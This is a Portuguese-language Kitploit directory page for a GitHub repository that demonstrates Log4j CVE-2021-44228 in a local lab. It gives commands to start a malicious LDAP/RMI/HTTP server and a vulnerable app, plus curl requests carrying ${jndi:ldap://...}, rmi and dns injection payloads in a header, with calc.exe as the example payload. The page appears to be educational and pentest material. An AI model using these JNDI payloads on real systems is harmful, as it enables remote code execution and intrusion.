Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
log4j-cve-2021-44228 — Exemplos de Log4j CVE-2021-44228: Execução Remota de Código (através de LDAP, RMI, ...), Consultas DNS forçadas, ... | Kitploit
Ferramentas/GitHubGitHub/manuel-alvarez-alvarez/log4j-cve-2021-44228
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubmanuel-alvarez-alvarez/log4j-cve-2021-44228

log4j-cve-2021-44228

Exemplos de Log4j CVE-2021-44228: Execução Remota de Código (através de LDAP, RMI, ...), Consultas DNS forçadas, ...

Ver Repositório
512há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Log4j CVE-2021-44228 e CVE-2021-45046

Pré-requisitos

Use um JDK vulnerável, por exemplo JDK 1.8.0_181

Uso

Servidor malicioso

O servidor malicioso implanta os seguintes endpoints:

  • 1389 Servidor LDAP
  • 1099 Servidor RMI
  • 8081 Servidor HTTP
root@kitploit:~
./gradlew :malicious-server:bootRun

Aplicação vulnerável

A aplicação vulnerável implanta um endpoint HTTP na 8082

root@kitploit:~
./gradlew :vulnerable-app:bootRun

Execução Remota de Código

Escolha um payload que será executado pela aplicação vulnerável e codifique-o em Base64. Como exemplo, para abrir a calculadora no Windows: calc.exe

LDAP

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:ldap://localhost:1389/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/

RMI

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:rmi://localhost:1099/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/

Consultas DNS

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:dns://8.8.8.8/google.es}" http://127.0.0.1:8082/
Baixar ferramenta